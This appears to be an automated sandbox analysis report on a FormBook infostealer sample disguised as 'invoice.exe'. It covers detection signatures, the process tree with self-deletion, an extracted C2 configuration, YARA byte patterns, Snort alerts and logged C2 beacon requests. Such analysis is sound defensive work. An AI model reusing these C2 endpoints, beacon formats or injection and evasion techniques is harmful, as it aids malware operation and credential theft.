Loading ...

Play interactive tourEdit tour

Analysis Report invoice.exe

Overview

General Information

Sample Name:invoice.exe
Analysis ID:383898
MD5:492017e064cab97dd8ea27abd3e5cfca
SHA1:a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
SHA256:524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • invoice.exe (PID: 1972 cmdline: 'C:\Users\user\Desktop\invoice.exe' MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
    • invoice.exe (PID: 480 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.invoice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.invoice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.invoice.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.invoice.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.invoice.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: invoice.exeJoe Sandbox ML: detected
          Source: 3.2.invoice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02BF81C0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02BF81B0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02BF96E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02BF96D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then pop esi3_2_0041584F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop esi9_2_021C584F

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.sookepointcargo.com/e3rs/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.zmid.xyz
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1Host: www.flowhcf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1Host: www.jinlan.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1Host: www.armaccountingbs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1Host: www.knoxvilleoutdoorkitchens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1Host: www.highdeserthealthinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1Host: www.hotelmaktub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1Host: www.legacyadmin.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1Host: www.flowhcf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1Host: www.jinlan.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1Host: www.armaccountingbs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1Host: www.knoxvilleoutdoorkitchens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1Host: www.highdeserthealthinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1Host: www.hotelmaktub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1Host: www.legacyadmin.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.flowhcf.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Thu, 08 Apr 2021 10:04:37 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp, invoice.exe, 00000000.00000002.245138274.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: invoice.exeString found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
          Source: invoice.exeString found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
          Source: invoice.exeString found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpString found in binary or memory: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
